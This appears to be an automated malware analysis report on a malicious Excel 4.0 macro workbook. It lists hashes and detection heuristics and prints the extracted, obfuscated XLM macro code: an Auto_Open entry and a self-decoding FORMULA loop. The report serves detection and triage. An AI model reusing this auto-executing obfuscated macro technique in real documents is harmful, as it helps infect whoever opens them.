Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4389455148881ae0…

MALICIOUS

Office (OLE)

Size: 35.5 KB
Created: 2020-11-25 10:28:42
Authoring application: Microsoft Excel
First seen: 2021-02-09
MD5: 86eeb00ba69418a0ac44237e43767ffb
SHA-1: 7065e83768567c6952152d7779a03600995f361b
SHA-256: 4389455148881ae05c9b9d5a391249a4a6ecbc0d7d7a1ffa4b00763bfdc38e1f
Risk score: 140

Heuristics (3)

  • [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME: Excel 4.0 Auto_Open defined name
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF defined name may be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms that the workbook has an XLM auto-execution entry.
  • [critical] OLE_XLM_DANGEROUS_FN: XLM Auto_Open with dangerous formula APIs
    The Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry together with dangerous XLM formula APIs that can invoke programs, write files, or transfer control without any VBA.
  • [medium] OLE_XLM_AUTOOPEN: Excel 4.0 (XLM) macro sheet present
    The workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 6487 bytes
SHA-256: cde665b20d1b650a7792bd03b508d25dad7c03163653e28dfd126220f59e281c
Script preview (first 1,000 lines of the extracted script):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     17 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  HcdrJOlf
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!I134 
' 0018     22 LABEL : Cell Value, String Constant - AZaqphq len=0 
' 0018     25 LABEL : Cell Value, String Constant - GzTvMNAUru len=0 
' 0018     22 LABEL : Cell Value, String Constant - hQQjnNl len=0 
' 0018     25 LABEL : Cell Value, String Constant - hWJLtASSXH len=0 
' 0018     20 LABEL : Cell Value, String Constant - IZMBd len=0 
' 0018     20 LABEL : Cell Value, String Constant - kdsne len=0 
' 0018     27 LABEL : Cell Value, String Constant - mhdNfyKEcnIP len=0 
' 0018     22 LABEL : Cell Value, String Constant - MQLGgUe len=0 
' 0018     22 LABEL : Cell Value, String Constant - oZjcBbZ len=0 
' 0018     22 LABEL : Cell Value, String Constant - pKOgToN len=0 
' 0018     20 LABEL : Cell Value, String Constant - PRiUy len=0 
' 0018     26 LABEL : Cell Value, String Constant - qDZgbdVyQGU len=0 
' 0018     22 LABEL : Cell Value, String Constant - QVdyFdU len=0 
' 0018     25 LABEL : Cell Value, String Constant - SPaiAIRWlg len=0 
' 0018     22 LABEL : Cell Value, String Constant - tPolKzc len=0 
' 0018     22 LABEL : Cell Value, String Constant - UpbkSsa len=0 
' 0018     20 LABEL : Cell Value, String Constant - URYSP len=0 
' 0018     25 LABEL : Cell Value, String Constant - VaIgAsBhmM len=0 
' 0018     22 LABEL : Cell Value, String Constant - XbEUVmd len=0 
' 0018     25 LABEL : Cell Value, String Constant - zIsyWKWBJN len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  HcdrJOlf,I50,"SET.NAME("hQQjnNl",VALUE("0"))",""
'  HcdrJOlf,I55,"SET.NAME("hWJLtASSXH",hQQjnNl)",""
'  HcdrJOlf,I59,"SET.NAME("UpbkSsa",hQQjnNl)",""
'  HcdrJOlf,I63,"SET.NAME("mhdNfyKEcnIP",COUNTA(AZaqphq))",""
'  HcdrJOlf,I68,"SET.NAME("VaIgAsBhmM",COUNTA(kdsne))",""
'  HcdrJOlf,I70,[],""
'  HcdrJOlf,I73,"SET.NAME("oZjcBbZ","")",""
'  HcdrJOlf,I76,"hWJLtASSXH",""
'  HcdrJOlf,I80,"SET.NAME("URYSP",HLOOKUP("*",AZaqphq,hWJLtASSXH,FALSE))",""
'  HcdrJOlf,I82,"zIsyWKWBJN",""
'  HcdrJOlf,I85,"SET.NAME("MQLGgUe",hQQjnNl)",""
'  HcdrJOlf,I89,[],""
'  HcdrJOlf,I94,"MQLGgUe",""
'  HcdrJOlf,I97,"SPaiAIRWlg",""
'  HcdrJOlf,I99,"IZMBd",""
'  HcdrJOlf,I101,"QVdyFdU",""
'  HcdrJOlf,I103,"SET.NAME("GzTvMNAUru",VALUE(HLOOKUP("*",kdsne,QVdyFdU,FALSE)))",""
'  HcdrJOlf,I107,"XbEUVmd",""
'  HcdrJOlf,I109,"oZjcBbZ",""
'  HcdrJOlf,I113,"UpbkSsa",""
'  HcdrJOlf,I115,NEXT(),""
'  HcdrJOlf,I119,"PRiUy",""
'  HcdrJOlf,I123,"SET.NAME("f",INT(T(FORMULA(T(oZjcBbZ)&"",""&T(PRiUy)))))",""
'  HcdrJOlf,I126,"qDZgbdVyQGU",""
'  HcdrJOlf,I129,NEXT(),""
'  HcdrJOlf,I132,RETURN(),""
'  HcdrJOlf,I159,"SET.NAME("tPolKzc",I50)",""
'  HcdrJOlf,I163,"AZaqphq",""
'  HcdrJOlf,I167,"SET.NAME("kdsne",R56C12)",""
'  HcdrJOlf,I169,"SET.NAME("qDZgbdVyQGU",177)",""
'  HcdrJOlf,I173,"SET.NAME("pKOgToN",9)",""
'  HcdrJOlf,I176,tPolKzc(),""
'  HcdrJOlf,I177,HALT(),""